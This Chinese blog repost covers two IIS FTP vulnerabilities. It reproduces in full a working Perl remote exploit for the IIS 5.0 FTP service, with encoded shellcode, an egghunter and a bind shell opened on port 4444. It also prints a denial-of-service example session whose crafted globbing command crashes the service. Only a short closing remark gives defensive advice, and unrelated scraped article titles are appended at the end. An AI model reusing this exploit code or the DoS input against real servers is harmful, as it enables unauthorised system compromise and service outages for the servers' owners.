现实生活中的信息安全一直不断验证那句俗语“春困夏乏秋无力,冬日正好眠”,随着夏季的来临,昼长夜短,天气炎热,大洋彼岸的安全组织仍在昼伏夜出寻找“Exploit”。或许是炎日烤化了微软FTP表面那层精装修的柏油,总之这个9月,身体健康的IIS“中暑”了。
漏洞一、IIS 5.0/5.1/6.0 Ftp服务存在安全漏洞

9月,微软确认IIS 5.0/5.1/6.0中存在安全漏洞并公布了受此漏洞影响的系统:IIS 5.0(Windows 2000)、IIS 5.1(Windows XP)和IIS 6.0(Windows Server 2003)。IIS 7.0(Windows Vista、Windows Server 2008)则不受此漏洞影响。IIS 6.0所受的威胁相比IIS 5.0/5.1较小,因为它构建在/GS之上,微软表示目前还没有发现利用此漏洞的***代码可以绕过/GS防护的。
从以上概述来说,目前可以直接利用此漏洞系统的为Winows 2000,既是已经补上SP4。
以下是国外论坛公布出的***代码:

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

视频操作过程请看http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/microsoft-ftp-server-remote-exploit.swf

漏洞二、还是FTP漏洞,拒绝服务

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

Example session where the anonymous user has read access to the folder "pub":
利用样例:

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>

By looking into my debugging session with OllyDbg I see that an exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.

Best Regards,

Nikolaos Rangos

IIS近年较少出现文中第一个0day那么严重的漏洞,较多都是些字符转换,后缀名解析方面的小漏洞,microsoft-ftp-server-remote-exploit,虽然已有论坛做出利用工具,好在如今使用IIS5.0的企业少之又少。当您发现诸如4444端口被开启时,或许您得考虑是否要安装一套完善的防火墙。

文章如转载,请注明转载自【网管小王的独立博客】:http://www.5iadmin.com/

转载于:https://blog.51cto.com/shanzhai/920480

FTP微软喊你回家吃饭相关推荐

  1. 贾君鹏你妈妈喊你回家吃饭

    贾君鹏你妈妈喊你回家吃饭原贴地址: http://tieba.baidu.com/f?ct=335544320&lm=0&rn=30&tn=postBrowserN&s ...

  2. 【Spark你妈喊你回家吃饭-01】 Spark是什么鬼?

    经过一段时间的学习和测试,是时候给spark的学习经历做一个总结了,对于spark的了解相对晚了写.春节期间(预计是无大事),本博准备推出20篇左右spark系列原创文章(先把牛吹出去再说) ,尽量将 ...

  3. 寂寞,你妈妈喊你回家吃饭——寂寞是一种罪

    抵制寂寞!寂寞是一种罪! 最近流行一句话:贾君鹏,你妈妈喊你回家吃饭. 一时之间,天下之人,皆要回家吃饭 最近流行一个党:寂寞教当道 一时之间,哥吃的就不是面了,是寂寞 哥发的也不是帖了,是寂寞 哥浑 ...

  4. 叶树:任总喊你回家吃饭 (zz)

    2010年10月30日,看过当月的<华为人>报后,本人在某网站发了如下短文. //z 2012-08-23 18:00:59 IS2120@CSDN.T3412314858[T2,L56, ...

  5. 刚子扯谈:“爆吧”圣斗士们,你妈没叫你回家吃饭

    文/刚子 2013年8月1日 2013年8月1日 北京,小雨雨初歇.小酒酒斟满! 今天标题扯上了"爆吧",大家也许懂,似乎也不太懂--此处省去你能想到的一切. 何为爆吧? 爆吧,其 ...

  6. 家庭厨房,如何共享美食?|回家吃饭产品分析

    一. 前言 本文试图通过对"回家吃饭APP"的版本迭代历程分析.用户分析.功能分析.运营分析以及数据表现来回答以下几个问题: (1)  回家吃饭的产品定位? (2)  回家吃饭产品 ...

  7. 回家吃饭Android客户端整理后总结

    仅供个人学习记录! 1.使用动态代理AOP编程框架简洁.高效开发 该动态代理框架的核心是通过dexmaker和Spring的拦截器实现AOP编程:dexmaker是运行在Android DVM上,利用 ...

  8. 腾讯,你妈喊你抄完作业回家吃饭

    打从娘胎出生开始,腾讯就开始抄袭ICQ,自从尝到了甜头之后,腾讯就做好准备从小抄到老,这辈子都和"抄袭"项链结婚了.可是风水轮流转,这不,腾讯抄"团购"的时候, ...

  9. 微软工业计算机主机怎么样,炸裂!设计师们,微软喊你们换电脑了

    就在苹果新款 Macbook Pro 发布的前一天,微软抢先开了一场发布会.虚拟现实.混合现实.更高配置的 Surface Book 等软硬件产品的发布,显得中规中矩,平静的发布会直到 Surface ...

最新文章

  1. java initcause_Java 异常
  2. Eureka 服务注册与发现02——集群版
  3. 独家揭秘 | 腾讯、Uber都在哪儿招人
  4. tensorflow随笔-读文件
  5. mysql 5.7 plugin 安装_mysql5.7以上版本安装
  6. SQL Server中的版本号
  7. vue-cli 安装
  8. iOS:主流启动优化方案浅析
  9. YUV422_UYVY图像格式转RGB565
  10. 电磁仿真原理——1.0 电磁仿真原理简介
  11. [渝粤教育] 浙江工商大学 中外经典演出欣赏 参考 资料
  12. 阿里云| 阿里云汇总
  13. 1分钟了解 rap2
  14. java后台地址(省,市,区)、姓名、手机号算法智能识别
  15. ArcMap批量等分割线流程
  16. dhrystone测试结果_测试cpu的简单工具-dhrystone | 学步园
  17. 大批量快速插入数据方法
  18. Visual Studio 2017正式版各版本比较:企业版最强大
  19. 移动软件开发:安卓APP首页构建
  20. BK05-蓝鲸智云-标准部署-关键模块逐步操作

热门文章

  1. RS507-ASEMI整流桥RS507
  2. 网络编程面试题:OSI模型是什么?/OSI模型介绍
  3. .NET Remoting 最简单示例
  4. Ubuntu 14.04 安装 USB无线网卡驱动
  5. BSgenome简介
  6. 张艾迪(创始人): 趣味励志
  7. Table固定列和表头
  8. K8S CoreDNS
  9. win10无法ping通他人计算机,同一局域网内Windows10之间不能ping通IP解决办法
  10. IP分片报文的接收与重组